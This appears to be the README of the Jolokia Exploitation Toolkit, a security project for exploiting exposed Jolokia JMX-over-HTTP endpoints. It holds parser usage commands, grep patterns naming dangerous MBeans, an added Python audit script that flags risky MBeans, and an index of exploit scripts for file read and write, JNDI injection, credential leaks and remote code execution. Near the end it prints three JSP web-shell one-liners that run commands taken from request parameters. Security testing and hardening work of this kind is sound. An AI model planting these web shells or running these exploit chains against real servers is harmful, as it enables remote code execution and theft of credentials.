Jolokia Exploitation Toolkit (JET) helps exploitation of exposed Jolokia endpoints.
Jolokia is a protocol bridge that lets users interact with MBeans (JMX) over HTTP. This endpoint exposes JMX features that are often dangerous, which implies that /jolokia should never be exposed and, if used internally (loopback), should be protected by an authentication mechanism.
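To see what an endpoint actually exposes before deciding whether it may stay reachable, the /jolokia/list response can be flattened into the same read/exec URL form that jolokia-parser.py emits and screened against the MBean names the usage section greps for. This is an added audit example, not the project's jolokia-parser.py; the list blob is constructed in the shape of a Jolokia list response, and the RISKY pattern mirrors the README's grep.

```python
import json
import re

# Constructed sample in the shape of a /jolokia/list response (three MBeans, trimmed).
SAMPLE_LIST = json.dumps({"value": {
    "JMImplementation": {"type=MBeanServerDelegate": {
        "desc": "Represents the MBean server from the management point of view.",
        "attr": {"MBeanServerId": {"type": "java.lang.String", "rw": False, "desc": "id"}}}},
    "jdk.management.jfr": {"type=FlightRecorder": {
        "desc": "Flight recorder",
        "op": {"takeSnapshot": {"args": [], "ret": "long", "desc": "snapshot"},
               "startRecording": {"args": [{"name": "p0", "type": "long", "desc": ""}],
                                  "ret": "void", "desc": "start"}}}},
    "com.sun.management": {"type=DiagnosticCommand": {
        "desc": "Diagnostic commands",
        "op": {"jfrStart": {"args": [{"name": "arguments", "type": "[Ljava.lang.String;", "desc": ""}],
                            "ret": "java.lang.String", "desc": "jfr"}}}},
}, "status": 200})

# The MBean and attribute names the README's grep singles out for review.
RISKY = re.compile(
    r"compilerDirectivesAdd|name=AccessLogValve,type=Valve/pattern|createStandardHost|jfrStart"
    r"|vmLog|read/Users:database=UserDatabase|MBeanFactory|reloadByURL|jvmtiAgentLoad"
    r"|environmentManager|log4j2", re.IGNORECASE)

def list_to_urls(blob, base="/jolokia"):
    """Flatten a list response into read/exec URLs, in the style of jolokia-parser.py output."""
    urls = []
    for domain, beans in json.loads(blob)["value"].items():
        for props, info in beans.items():
            name = f"{domain}:{props}"
            for attr in info.get("attr", {}):
                urls.append(f"{base}/read/{name}/{attr}")
            for op, sigs in info.get("op", {}).items():
                # An overloaded operation is listed as an array of signatures.
                for sig in (sigs if isinstance(sigs, list) else [sigs]):
                    args = "".join(f"/${a['type']}" for a in sig["args"])
                    urls.append(f"{base}/exec/{name}/{op}{args}")
    return urls

def audit(blob):
    """Return only the URLs that no unauthenticated, reachable endpoint should be serving."""
    return [u for u in list_to_urls(blob) if RISKY.search(u)]
```

Anything `audit` returns on a real list blob is an MBean that should be behind authentication or denied by the Jolokia access policy, not reachable from the network.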
Doc says... :)
Jolokia is a JMX-HTTP bridge giving an alternative to JSR-160 connectors. It is an agent based approach with support for many platforms. In addition to basic JMX operations it enhances JMX remoting with unique features like bulk requests and fine grained security policies.
- Java projects
- /jolokia
- /actuator/jolokia
- ???
You can either start up a Tomcat server (docker || docker-compose) and install the Jolokia WAR,
or run `docker run --rm -it --net=host bodsch/docker-jolokia` and go with the flow ~
```bash
# Setup with virtualenv
virtualenv -p python3 .venv && source .venv/bin/activate
pip install -r requirements.txt

# Use jolokia-parser.py with remote url
python jolokia-parser.py http://127.0.0.1/jolokia | tee jolokia-parsed.lst

# Or use jolokia-parser.py with local json
curl http://127.0.0.1/jolokia/list -o jolokia-list.json
python jolokia-parser.py jolokia-list.json | sed 's#^/jolokia#http://127.0.0.1/jolokia#g' | tee jolokia-parsed.lst

# Quickly find the cool MBeans
grep -iP 'compilerDirectivesAdd|name=AccessLogValve,type=Valve/pattern|createStandardHost|jfrStart|vmLog|read/Users:database=UserDatabase|MBeanFactory|reloadByURL|jvmtiAgentLoad|environmentManager|log4j2' jolokia-parsed.lst

# Quickly find information leaks, paths, user, etc
grep -iP 'Runtime/(BootClassPath|ClassPath|InputArguments|LibraryPath|SystemProperties)' jolokia-parsed.lst
```

The expected output in jolokia-parsed.lst is the following:
```
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor
[+] CLASS : javax.management.MBeanServerDelegate
[+] DESC : Represents the MBean server from the management point of view.
[+] DESC : getRecordingOptions // returns javax.management.openmbean.TabularData
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/getRecordingOptions/$long
[+] DESC : takeSnapshot // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/takeSnapshot
[+] DESC : closeRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/closeRecording/$long
[+] DESC : newRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/newRecording
[+] DESC : setRecordingSettings // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingSettings/$long/$javax.management.openmbean.TabularData
[+] DESC : openStream // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/openStream/$long/$javax.management.openmbean.TabularData
[+] DESC : cloneRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/cloneRecording/$long/$boolean
[+] DESC : setRecordingOptions // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingOptions/$long/$javax.management.openmbean.TabularData
[+] DESC : copyTo // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/copyTo/$long/$java.lang.String
[+] DESC : startRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/startRecording/$long
[...]
```

🚧 ADD AUTH TO YOUR JSP 🚧

```jsp
<% Runtime.getRuntime().exec(new String[] { "sh", "-c", "cmd" }); %>
<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%>
<%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %>
```

- @TheLaluka
- jolokia-parser.py | Convert /jolokia/list or json blob to human-readable urls
- exploits/file-write-to-rce-vhost-jfr.md | File read and file write to RCE by deploying a vhost with MBeanFactory/createStandardHost and DiagnosticCommand/jfrStart
- exploits/file-read-compilerdirectivesadd.md | File read with DiagnosticCommand/compilerDirectivesAdd
- exploits/file-write-to-rce-vmLog.md | File write to RCE with DiagnosticCommand/vmLog
- @Coiffeur0x90
- exploits/file-write-to-rce-valve.py | File write with Catalina:host=localhost,name=AccessLogValve (exploit)
- exploits/file-write-to-rce-valve.md | File write with Catalina:host=localhost,name=AccessLogValve (article)
- exploits/info-leak-tomcat-creds.py | Tomcat credentials leak with Users:database=UserDatabase,type=UserDatabase
- @mpgn_x64
- exploits/jndi-logback.md | XXE to RCE with ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL
- RicterZ
- exploits/jndi-injection-MBeanFactory.py | RCE with JNDI Injection (Tomcat EL) with MBeanFactory
- @lely__
- exploits/jndi-ldap-target.md | RMI injection with jolokia proxy url handling
- @JJaaskela
- exploits/file-write-to-rce-jar-load-jvmtiAgentLoad.py | jvmtiAgentLoad to RCE with JAR or SO/DLL load
- @mbadanoiu
- exploits/log4jolokia.py | Log4J configuration reload to file read/write & RCE with tricks!
- You SHOULD be here? Let me know and I'll fix that!
- https://jolokia.org/
- https://thinkloveshare.com/hacking/shells_with_jolokia_exploitation_toolkit/
- https://thinkloveshare.com/en/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
- https://therealcoiffeur.github.io/c11011
- https://github.com/mpgn/Spring-Boot-Actuator-Exploit
- https://www.cvedetails.com/vulnerability-list/vendor_id-14175/Jolokia.html
- https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt
- https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
- https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
- https://github.com/mbadanoiu/jvmtiAgentLoad-Exploit
- https://github.com/mbadanoiu/log4jolokia
- https://blog.pyn3rd.com/2022/11/15/A-New-Way-of-Jolokia-Remote-Code-Execution/
